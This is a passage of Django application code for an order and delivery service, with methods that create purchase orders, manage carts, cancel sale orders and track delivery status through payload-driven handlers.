forex.exists():\n\t\t\t\t\t\t\t\tamount = Decimal(amount*forex[0].exchange_rate).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\t\t\t\t\tlgr.info('Forex Calculate amount to %s|from: %s| %s' % (order_currency, currency, amount) )\n\n\t\t\t\t\t\tpayload['bill_manager_id'] = bill_manager.id\n\t\t\t\t\t\tpayload['amount'] = amount\n\t\t\t\t\t\tpayload['purchase_order_id'] = order.id\n\t\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\t\tpayload[\"response\"] = \"Bill Payment Accepted. Balance: %s\" % bill_manager.balance_bf\n\t\t\t\t\telse:\n\t\t\t\t\t\tpayload['amount'] = Decimal(0)\n\t\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\t\tpayload[\"response\"] = \"No Amount to pay outstanding bill\"\n\t\t\t\telse:\n\t\t\t\t\t#!!IMPORTANT - Or Account would be debitted on no bill\n\t\t\t\t\tpayload['amount'] = Decimal(0)\n\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\tpayload[\"response\"] = \"No Purchase Order with given reference\"\n\t\t\telse:\n\t\t\t\t#!!IMPORTANT - Or Account would be debitted on no bill\n\t\t\t\tpayload['amount'] = Decimal(0)\n\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\tpayload[\"response\"] = \"No Purchase Order reference was given\"\n\n\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on pay bill: %s\" % e)\n\t\treturn payload\n\n\n\tdef add_to_purchase_order(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\t#Ensure cart product items tills match, and cart item is not added to any other purchase order\n\t\t\tcart_items = CartItem.objects.filter(id__in=str(payload['cart_items'].strip()).split(','),purchaseorder=None)\n\n\t\t\tif cart_items.exists():\n\t\t\t\t#get greates reference from un-expired/unpaid list (expiry after 15days)\n\t\t\t\tif 'session_gateway_profile_id' in payload.keys():\n\t\t\t\t\tsession_gateway_profile = GatewayProfile.objects.get(id=payload['session_gateway_profile_id'])\n\t\t\t\telse:\n\t\t\t\t\tsession_gateway_profile = gateway_profile\n\n\t\t\t\tbill_manager = BillManager.objects.filter(order__gateway_profile=session_gateway_profile).order_by('-date_created')\n\n\t\t\t\tif 'purchase_order_id' in payload.keys():\n\t\t\t\t\tbill_manager = bill_manager.filter(order__id=payload['purchase_order_id'])\n\t\t\t\telif 'reference' in payload.keys():\n\t\t\t\t\treference = payload['reference'].strip()\n\t\t\t\t\tbill_manager = bill_manager.filter(order__reference__iexact=reference)\n\t\t\t\telif 'transaction_reference' in payload.keys():\n\t\t\t\t\tbill_manager_extract = bill_manager.filter(transaction_reference = payload['transaction_reference'])\n\t\t\t\t\tif bill_manager_extract.exists(): bill_manager = bill_manager.filter(order=bill_manager_extract[0].order)\n\t\t\t\t\telse: bill_manager = bill_manager.none()\n\t\t\t\telse:\n\t\t\t\t\tbill_manager = bill_manager.none()\n\t\t\t\tif bill_manager.exists():\n\t\t\t\t\tbalance_bf = bill_manager[0].balance_bf\n\t\t\t\t\tfor item in cart_items:\n\t\t\t\t\t\tpurchase_order = bill_manager[0].order\n\t\t\t\t\t\tbalance_bf = self.get_balance_bf(item, purchase_order, balance_bf)\n\t\t\t\t\t\t#Primary Item Bill Entry\n\t\t\t\t\t\tbill_manager = self.bill_entry(item, purchase_order, balance_bf, payload)\n\n\t\t\t\t\t\tbalance_bf = self.sale_charge_bill_entry(balance_bf, item, payload, purchase_order, gateway_profile.gateway)\n\n\t\t\t\t\tpayload['reference'] = purchase_order.reference\n\n\t\t\t\t\tpayload['purchase_order_id'] = 
purchase_order.id\n\n\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\tpayload[\"response\"] = \"Purchase Order Created\"\n\t\t\t\telse:\n\t\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\t\tpayload[\"response\"] = \"No order Found\"\n\n\t\t\telse:\n\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\tpayload[\"response\"] = \"No Cart Items Found\"\n\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on creating purchase order: %s\" % e,exc_info=True)\n\t\treturn payload\n\n\n\tdef create_purchase_order(self, payload, node_info):\n\t\ttry:\n\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\t#Ensure cart product items tills match\n\t\t\tcart_items = CartItem.objects.filter(id__in=str(payload['cart_items'].strip()).split(','),\\\n\t\t\t\t\t status=CartStatus.objects.get(name='UNPAID'))\n\n\t\t\tif cart_items.exists():\n\t\t\t\tif 'session_gateway_profile_id' in payload.keys():\n\t\t\t\t\tsession_gateway_profile = GatewayProfile.objects.get(id=payload['session_gateway_profile_id'])\n\t\t\t\telse:\n\t\t\t\t\tsession_gateway_profile = gateway_profile\n\t\t\t\t\tsession_gateway_profile_system = GatewayProfile.objects.get(gateway=gateway_profile.gateway,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t user__username='System@User',status__name='ACTIVATED')\n\n\t\t\t\t#creates reference from un-expired&unpaid list (expiry after 15days)\n\n\t\t\t\tdef reference(pre_reference):\n\t\t\t\t\tchars = string.ascii_letters \n\t\t\t\t\tnums = string.digits\n\t\t\t\t\trnd = random.SystemRandom()\n\t\t\t\t\tprefix = ''.join(rnd.choice(chars) for i in range(3))\n\t\t\t\t\tsuffix = ''.join(rnd.choice(nums) for i in range(2,4))\n\t\t\t\t\ttrial = '%s-%s%s' % (''.join(re.findall(r'[\\d\\w]+', pre_reference)).upper()[:4], prefix.upper(), suffix)\n\t\t\t\t\t#reference_list = PurchaseOrder.objects.filter(reference=trial,status__name='UNPAID',\\\n\t\t\t\t\t#\t\texpiry__gte=timezone.now()).order_by('-reference')[:1]\n\n\t\t\t\t\treference_list = PurchaseOrder.objects.filter(reference=trial, expiry__gte=timezone.now()).order_by('-reference')[:1]\n\t\t\t\t\tif reference_list.exists():\n\t\t\t\t\t\treturn reference(pre_reference)\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn trial\n\n\t\t\t\tif 'reference' in payload.keys():\n\t\t\t\t\treference_order = PurchaseOrder.objects.filter(status__name='UNPAID', reference__iexact=payload['reference'], expiry__gte=timezone.now(), \n\t\t\t\t\t\t\t\tcart_item__product_item__institution__id__in=[i['product_item__institution__id'] \\\n\t\t\t\t\t\t\t\tfor i in cart_items.values('product_item__institution__id').distinct('product_item__institution__id')])\n\t\t\t\t\tif reference_order.exists(): reference_order.update(status=OrderStatus.objects.get(name='CANCELLED'))\t\t\t\n\t\t\t\t\treference = payload['reference']\n\t\t\t\telif 'institution_id' in payload.keys():\n\t\t\t\t\tinstitution = Institution.objects.get(id=payload['institution_id'])\n\t\t\t\t\treference = reference(institution.business_number)\n\t\t\t\telse:\n\t\t\t\t\treference = reference(gateway_profile.gateway.name)\n\n\t\t\t\tif 'expiry' in payload.keys():\n\t\t\t\t\texpiry = datetime.strptime(payload['expiry'], '%Y-%m-%d')\n\t\t\t\telif 'expiry_years_period' in payload.keys():\n\t\t\t\t\texpiry = timezone.now()+timezone.timedelta(days=(365*int(payload['expiry_years_period'])))\n\t\t\t\telif 'expiry_days_period' in payload.keys():\n\t\t\t\t\texpiry = timezone.now()+timezone.timedelta(days=(int(payload['expiry_days_period'])))\n\t\t\t\telif 
'expiry_hours_period' in payload.keys():\n\t\t\t\t\texpiry = timezone.now()+timezone.timedelta(hours=(int(payload['expiry_hours_period'])))\n\t\t\t\telif 'expiry_minutes_period' in payload.keys():\n\t\t\t\t\texpiry = timezone.now()+timezone.timedelta(minutes=(int(payload['expiry_minutes_period'])))\n\t\t\t\telif 'expiry_seconds_period' in payload.keys():\n\t\t\t\t\texpiry = timezone.now()+timezone.timedelta(seconds=(int(payload['expiry_seconds_period'])))\n\t\t\t\telse:\n\t\t\t\t\texpiry = timezone.localtime(timezone.now())+timezone.timedelta(days=45)\n\n\t\t\t\tstatus = OrderStatus.objects.get(name='UNPAID')\n\t\t\t\tcurrency = cart_items[0].currency\n\n\t\t\t\tpurchase_order = PurchaseOrder(reference=reference,\\\n\t\t\t\t\t\tcurrency=currency,\\\n\t\t\t\t\t\tstatus=status,expiry=expiry, gateway_profile=session_gateway_profile)\n\n\t\t\t\tif 'description' in payload.keys():\n\t\t\t\t\tpurchase_order.description = payload['description']\n\t\t\t\telif 'description' not in payload.keys() and 'comment' in payload.keys():\n\t\t\t\t\tpurchase_order.description = payload['comment']\n\t\t\n\t\t\t\tpurchase_order.save()\t\n\n\t\t\t\tbalance_bf = Decimal(0)\n\t\t\t\tfor item in cart_items:\n\t\t\t\t\tbalance_bf = self.get_balance_bf(item, purchase_order, balance_bf)\n\t\t\t\t\t#Primary Item Bill Entry\n\t\t\t\t\tbill_manager = self.bill_entry(item, purchase_order, balance_bf, payload)\n\n\t\t\t\t\tbalance_bf = self.sale_charge_bill_entry(balance_bf, item, payload, purchase_order, gateway_profile.gateway)\n\n\t\t\t\tpayload['reference'] = purchase_order.reference\n\t\t\t\tpayload['purchase_order_id'] = purchase_order.id\n\n\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\tpayload[\"response\"] = \"Purchase Order Created\"\n\t\texcept Exception as e:\n\t\t\tpayload['response'] = str(e)\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on creating purchase order: %s\" % e,exc_info=True)\n\t\treturn payload\n\n\tdef add_product_to_cart(self, payload, node_info):\n\t\ttry:\n\n\t\t\tproduct_item = ProductItem.objects.get(id=payload['product_item_id'])\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\n\n\n\t\t\tquantity = Decimal(payload['quantity']) if 'quantity' in payload.keys() and payload['quantity'] not in [\"\",None] else Decimal(1)\n\t\t\tsub_total = Decimal(product_item.unit_cost*quantity).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\ttotal = sub_total\n\n\t\t\tif 'quantity' not in payload.keys() and product_item.variable_unit and 'amount' in payload.keys():\n\t\t\t\tquantity = Decimal(Decimal(payload['amount'])/product_item.unit_cost).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\t\tsub_total = Decimal(product_item.unit_cost*quantity).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\t\ttotal = sub_total\n\n\n\t\t\tprimary_item = self.cart_entry(product_item, payload, quantity, sub_total, total)\n\n\t\t\tpayload['cart_items'] = '%s%s' % (primary_item.id, ','+payload['cart_items'] if 'cart_items' in payload.keys() else '')\n\n\t\t\tsale_charge_item = self.sale_charge_item(total, primary_item, payload, gateway_profile.gateway)\n\t\t\tif sale_charge_item:\n\t\t\t\tpayload['cart_items'] = '%s%s' % (sale_charge_item.id, ','+payload['cart_items'] if 'cart_items' in payload.keys() else '')\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Product Added to Cart\"\n\t\texcept Exception as e:\n\t\t\tpayload['response'] = str(e)\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on 
Adding product to cart: %s\" % e,exc_info=True)\n\t\treturn payload\n\n\tdef cancel_sale_order(self, payload, node_info):\n\t\ttry:\n\n\t\t\treference = payload['reference'].strip() if 'reference' in payload.keys() else \"\"\n\t\t\tpurchase_order = PurchaseOrder.objects.filter(reference=reference, status__name='UNPAID')\n\n\t\t\tif 'purchase_order_id' in payload.keys():\n\t\t\t\tpurchase_order = purchase_order.filter(id=payload['purchase_order_id'])\n\n\t\t\tif purchase_order.exists():\n\t\t\t\tpurchase_order.update(status=OrderStatus.objects.get(name='CANCELLED'))\n\t\t\t\tfor c in purchase_order:\n\t\t\t\t\tc.update(status=CartStatus.objects.get(name='CANCELLED'))\n\n\t\t\t\tpayload['response'] = 'Sale Order Cancelled'\n\t\t\t\tpayload['response_status'] = '00'\n\t\t\telse:\n\t\t\t\tpayload['response_status'] = '25'\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Reversing Sale Order: %s\" % e)\n\t\treturn payload\n\n\n\tdef add_to_order(self, payload, node_info):\n\t\ttry:\n\t\t\tpayload = self.add_product_to_cart(payload, node_info)\n\t\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\t\tpayload = self.add_to_purchase_order(payload, node_info)\n\t\t\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\tif 'reference' in payload.keys():\n\t\t\t\t\t\tpayload[\"response\"] = payload['reference']\n\t\t\t\t\telse:\n\t\t\t\t\t\tpayload[\"response\"] = \"Sale Order\"\n\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Sale Order: %s\" % e)\n\t\treturn payload\n\n\n\n\tdef bulk_sale_order(self, payload, node_info):\n\t\ttry:\n\t\t\tproduct_item_list = payload['product_item_list']\n\t\t\tpurchase_order_id = None\n\t\t\tfor i in product_item_list:\n\t\t\t\tpayload = self.add_product_to_cart(i, node_info)\n\t\t\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\t\t\tif purchase_order_id:\n\t\t\t\t\t\tpayload['purchase_order_id'] = purchase_order_id\n\t\t\t\t\t\tpayload = self.add_to_purchase_order(payload, node_info)\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tpayload = self.create_purchase_order(payload, node_info)\n\t\t\t\t\t\tpurchase_order_id = payload['purchase_order_id']\n\n\t\t\t\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\t\tif 'reference' in payload.keys():\n\t\t\t\t\t\t\tpayload[\"response\"] = payload['reference']\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpayload[\"response\"] = \"Sale Order\"\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\n\t\texcept Exception as e:\n\t\t\tpayload['response'] = str(e)\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Sale Order: %s\" % e)\n\t\treturn payload\n\n\n\tdef sale_order(self, payload, node_info):\n\t\ttry:\n\t\t\tpayload = self.add_product_to_cart(payload, node_info)\n\t\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\t\tpayload = self.create_purchase_order(payload, node_info)\n\t\t\t\tif 'response_status' in payload.keys() and payload['response_status'] == '00':\n\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\tif 'reference' in payload.keys():\n\t\t\t\t\t\tpayload[\"response\"] = payload['reference']\n\t\t\t\t\telse:\n\t\t\t\t\t\tpayload[\"response\"] = \"Sale Order\"\n\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = 
'96'\n\t\t\tlgr.info(\"Error on Creating Sale Order: %s\" % e)\n\t\treturn payload\n\n\n\tdef create_sale_contact(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tsale_contact_type = SaleContactType.objects.get(id=payload[\"sale_contact_type\"])\n\n\n\t\t\t#transaction_reference = payload['bridge__transaction_id'] if 'bridge__transaction_id' in payload.keys() else None\n\t\t\ttransaction = Transaction.objects.get(id=payload[\"bridge__transaction_id\"])\n\n\t\t\tprimary_contact_profile = Profile.objects.get(id=payload['profile_id'])\n\t\t\tlgr.info(\"Starting Generating Till Number\")\n\t\t\tall_contacts = SaleContact.objects.filter(institution=gateway_profile.institution).order_by(\"-sale_contact_number\")[:1]\n\t\t\tif len(all_contacts)>0:\n\t\t\t\tsale_contact_number = all_contacts[0].sale_contact_number+1\n\t\t\telse:\n\t\t\t\tsale_contact_number = 1\n\n\t\t\ttry:details = json.loads(transaction.request)\n\t\t\texcept: details = json.loads({})\n\n\t\t\tif \"sale_contact_name\" in details.keys(): del details[\"sale_contact_name\"]\n\t\t\tif \"sale_contact_type\" in details.keys(): del details[\"sale_contact_type\"]\n\t\t\tif \"comment\" in details.keys(): del details[\"comment\"]\n\n\t\t\tsale_contact = SaleContact(name=payload['sale_contact_name'],description=payload['sale_contact_name'],\\\n\t\t\t\t\tsale_contact_type=sale_contact_type,geometry=transaction.geometry,\\\n\t\t\t\t\tsale_contact_number=sale_contact_number,institution=gateway_profile.institution,\\\n\t\t\t\t\tprimary_contact_profile=primary_contact_profile,details=details,created_by=gateway_profile)\n\n\t\t\tif 'sale_contact_location' in payload.keys():\n\t\t\t\tsale_contact.location=payload['sale_contact_location'],\n\t\t\tif \"comment\" in payload.keys():\n\t\t\t\tsale_contact.comment = payload[\"comment\"]\n\t\t\tsale_contact.save()\n\n\t\t\tpayload['sale_contact_id'] = sale_contact.id\n\t\t\tpayload['sale_contact_number'] = sale_contact.sale_contact_number\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Sale Contact Created\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Sale Contact: %s\" % e)\n\t\treturn payload\n\n\tdef delivery_notification(self, payload, node_info):\n\t\t'''\n\t\tadd model pos.DeliveryContact\n\t\t\tprofile (upc.Profile)\n\t\t\tinstitution (upc.Institution)\n\t\t\tstatus AVAILABLE DELIVERING\n\t\tadd model pos.DeliveryActivity\n\t\t\tdelivery (pos.Delivery)\n\t\t\tcontact (pos.DeliveryContact)\n\t\t\tstatus NOTIFIED ACCEPTED REJECTED\n\t\t'''\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\ttry:\n\t\t\t\tdelivery_contact = DeliveryContact.objects.get(gateway_profile = gateway_profile)\n\t\t\texcept:\n\t\t\t\tdelivery_contact = DeliveryContact()\n\t\t\t\tdelivery_contact.gateway_profile = gateway_profile\n\t\t\t\tdelivery_contact.save()\n\n\t\t\tdelivery_activity = DeliveryActivity()\n\t\t\tdelivery_activity.delivery_id = payload['delivery']\n\t\t\tdelivery_activity.contact = delivery_contact\n\t\t\tdelivery_activity.status = DeliveryActivityStatus.objects.get(name='NOTIFIED')\n\t\t\tdelivery_activity.save()\n\n\t\t\t# TODO : send delivery notification\n\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Sale Contact Created\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Sale Contact: 
%s\" % e)\n\n\t\treturn payload\n\n\tdef create_delivery(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tpurchase_order = PurchaseOrder.objects.get(id=payload['purchase_order_id'])\n\n\t\t\tif 'delivery_location_coord' not in payload.keys() and 'delivery_location_name' not in payload.keys():\n\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\tpayload[\"response\"] = \"Delivery Not Created, No Location Specified\"\n\t\t\t\treturn payload\n\n\t\t\t# delivery_types = DeliveryType.objects.filter(institution=institution)\n\t\t\t# if delivery_types.exists():\n\t\t\tdeliveries = Delivery.objects.filter(order=purchase_order)\n\t\t\tif not deliveries.exists():\n\t\t\t\tdelivery = Delivery()\n\t\t\t\tdelivery.order_id = payload['purchase_order_id']\n\t\t\t\tdelivery.status = DeliveryStatus.objects.get(name='CREATED')\n\t\t\t\t# TODO\n\n\t\t\t\ttry:\n\t\t\t\t\tdate_string = payload['scheduled_date'] + ' ' + payload['scheduled_time']\n\t\t\t\t\tdate_obj = datetime.strptime(date_string, '%d/%m/%Y %I:%M %p')\n\t\t\t\t\tscheduled_send = pytz.timezone(gateway_profile.user.profile.timezone).localize(date_obj)\n\t\t\t\t\tdelivery.schedule = scheduled_send\n\n\t\t\t\texcept:pass\n\t\t\t\tlgr.info(\"Delivery schedule : {}\".format(delivery.schedule))\n\n\t\t\t\tif 'delivery_location_coord' in payload.keys():\n\t\t\t\t\tcoordinates = payload['delivery_location_coord']\n\t\t\t\t\tlongitude, latitude = coordinates.split(',', 1)\n\t\t\t\t\ttrans_point = Point(float(longitude), float(latitude))\n\t\t\t\t\tdelivery.destination_coord = trans_point\n\t\t\t\tif 'delivery_location_name' in payload.keys():\n\t\t\t\t\tdelivery.destination_name = payload['delivery_location_name']\n\n\n\t\t\t\tdelivery.save()\n\n\t\t\t\tpayload[\"delivery_id\"] = delivery.pk\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Delivery Created\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Delivery: %s\" % e)\n\n\t\treturn payload\n\n\n\tdef create_delivery_type(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tinstitution = gateway_profile.institution\n\t\t\tchannel = Channel.objects.get(name=payload['channel'])\n\n\t\t\tdelivery_types = DeliveryType.objects.filter(institution=institution,channel=channel,gateway=gateway_profile.gateway)\n\t\t\tif delivery_types.exists():\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tdelivery_type = DeliveryType()\n\t\t\t\tdelivery_type.channel = channel\n\t\t\t\tdelivery_type.institution = institution\n\t\t\t\tdelivery_type.status = DeliveryTypeStatus.objects.get(name='ACTIVE')\n\t\t\t\tdelivery_type.gateway = gateway_profile.gateway\n\t\t\t\tdelivery_type.save()\n\t\t\t\tpayload[\"delivery_id\"] = delivery_type.pk\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Delivery Type Created\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Creating Delivery Type: %s\" % e)\n\n\t\treturn payload\n\n\n\tdef assign_order(self, payload, node_info):\n\t\ttry:\n\t\t\tdelivery = Delivery.objects.get(pk=payload['delivery_id'])\n\t\t\tdelivery_profile = GatewayProfile.objects.get(id=payload['session_gateway_profile_id'])\n\n\t\t\tdelivery.delivery_profile = delivery_profile\n\t\t\tdelivery.status = DeliveryStatus.objects.get(name='ASSIGNED')\n\t\t\tdelivery.save()\n\n\t\t\t# used for sending 
notifications\n\t\t\tpayload['msisdn'] = delivery_profile.msisdn.phone_number\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Delivery Assigned\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Assigning Delivery: %s\" % e)\n\n\t\treturn payload\n\n\tdef order_has_delivery(self, payload, node_info):\n\t\t'''\n\t\tAdds a trigger `has_delivery` if the purchaser_order has a Delivery\n\t\t'''\n\t\ttry:\n\t\t\tdeliveries = Delivery.objects.filter(order_id=payload['purchase_order_id'])\n\t\t\tif deliveries.exists():\n\t\t\t\tpayload['delivery_id'] = deliveries[0].pk\n\t\t\t\tpayload['trigger'] = 'has_delivery%s' % (',' + payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\telse:\n\t\t\t\tpayload['trigger'] = 'no_delivery%s' % (\n\t\t\t\t\t',' + payload['trigger'] if 'trigger' in payload.keys() else '')\n\n\t\t\tpayload['response_status'] = '00'\n\t\t\tpayload['response'] = 'Checked Delivery'\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Checking Delivery: %s\" % e)\n\t\treturn payload\n\n\n\tdef order_status(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tif 'delivery_id' in payload.keys():\n\t\t\t\tdelivery = Delivery.objects.get(id=payload['delivery_id'])\n\t\t\telif 'purchase_order_id' in payload.keys():\n\t\t\t\tpurchase_order = PurchaseOrder.objects.get(id=payload['purchase_order_id'])\n\t\t\t\tdelivery = Delivery.objects.filter(order=purchase_order).first()\n\t\t\t# delivery = Delivery.objects.get(id=payload['delivery_id'])\n\n\t\t\tpurchase_order = delivery.order\n\t\t\tpayload['purchase_order_id'] = purchase_order.pk\n\t\t\tif gateway_profile.access_level == AccessLevel.objects.get(name='DELIVERY'):\n\t\t\t\t# accepted_by_me\n\t\t\t\tif delivery.delivery_profile == gateway_profile:\n\t\t\t\t\tif delivery.status.name == 'IN PROGRESS':\n\t\t\t\t\t\tpayload['trigger'] = 'accepted_by_me%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\t\t\telif delivery.status.name == 'ASSIGNED':\n\t\t\t\t\t\tpayload['trigger'] = 'accepted_by_none%s' % (',' + payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\telse:\n\t\t\t\tif delivery.status.name =='WAITTING CONFIRMATION':\n\t\t\t\t\tpayload['trigger'] = 'should_confirm%s' % (',' + payload['trigger'] if 'trigger' in payload.keys() else '')\n\n\t\t\tpayload['delivery_status'] = delivery.status.name\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Got Purchase Order Details\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on getting Purchase Order Details: %s\" % e)\n\n\t\treturn payload\n\n\n\tdef accept_order(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tdelivery = Delivery.objects.get(id=payload['delivery_id'])\n\n\t\t\tpurchase_order = delivery.order\n\t\t\tpayload['purchase_order_id'] = purchase_order.pk\n\n\t\t\t#coordinates = payload['delivery_origin']\n\t\t\t#longitude, latitude = coordinates.split(',', 1)\n\t\t\t#trans_point = Point(float(longitude), float(latitude))\n\t\t\t#delivery.origin_name = coordinates\n\t\t\t#delivery.origin_coord = trans_point\n\t\t\tdelivery.status = DeliveryStatus.objects.get(name='IN PROGRESS')\n\t\t\tdelivery.save()\n\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = 
\"Delivery Accepted Accepted\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on accepting Delivery: %s\" % e)\n\n\t\treturn payload\n\n\tdef delivery_done(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tdelivery = Delivery.objects.get(id=payload['delivery_id'])\n\n\t\t\tdelivery.status = DeliveryStatus.objects.get(name='WAITTING CONFIRMATION')\n\t\t\tdelivery.save()\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Delivery DELIVERED\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Completing Delivery: %s\" % e)\n\n\t\treturn payload\n\n\tdef delivery_details(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tif 'delivery_id' in payload.keys():\n\t\t\t\tdelivery = Delivery.objects.get(id=payload['delivery_id'])\n\n\t\t\telif 'purchase_order_id' in payload.keys():\n\t\t\t\tpurchase_order = PurchaseOrder.objects.get(id=payload['purchase_order_id'])\n\t\t\t\tdelivery = Delivery.objects.filter(order=purchase_order).first()\n\n\t\t\tpurchase_order = delivery.order\n\t\t\tpayload['purchase_order_id'] = purchase_order.pk\n\t\t\tpayload['delivery_status'] = delivery.status.name\n\n\t\t\tif delivery.delivery_profile:\n\t\t\t\tif delivery.delivery_profile.msisdn: payload['delivery_profile_phone'] = delivery.delivery_profile.msisdn.phone_number\n\t\t\t\tdelivery_user = delivery.delivery_profile.user\n\t\t\t\tpayload['delivery_profile_name'] = delivery_user.first_name +' '+delivery_user.last_name\n\n\t\t\tpayload['delivery_origin_name'] = delivery.origin_name\n\t\t\tif delivery.origin_coord:\n\t\t\t\tpayload['delivery_origin_coord'] = '{},{}'.format(delivery.origin_coord.x,delivery.origin_coord.y)\n\t\t\tpayload['delivery_destination_name'] = delivery.destination_name\n\t\t\tif delivery.destination_coord:\n\t\t\t\tpayload['delivery_destination_coord'] = '{},{}'.format(delivery.destination_coord.x, delivery.destination_coord.y)\n\n\t\t\tdelivery_recipient = purchase_order.gateway_profile\n\t\t\tpayload['delivery_recipient_name'] = delivery_recipient.user.first_name+' '+delivery_recipient.user.last_name\n\t\t\tif delivery_recipient.msisdn:payload['delivery_recipient_phone'] = delivery_recipient.msisdn.phone_number\n\n\t\t\tpayload['delivery_schedule'] = delivery.schedule\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Got Delivery Details\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error Getting Delivery Details: %s\" % e)\n\t\treturn payload\n\t\n\tdef delivery_confirm(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\t#purchase_order = PurchaseOrder.objects.get()\n\t\t\tdelivery = Delivery.objects.get(id=payload['delivery_id'])\n\n\t\t\tdelivery.status = DeliveryStatus.objects.get(name='DELIVERED')\n\t\t\tdelivery.save()\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Delivery Activity confirmed\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = 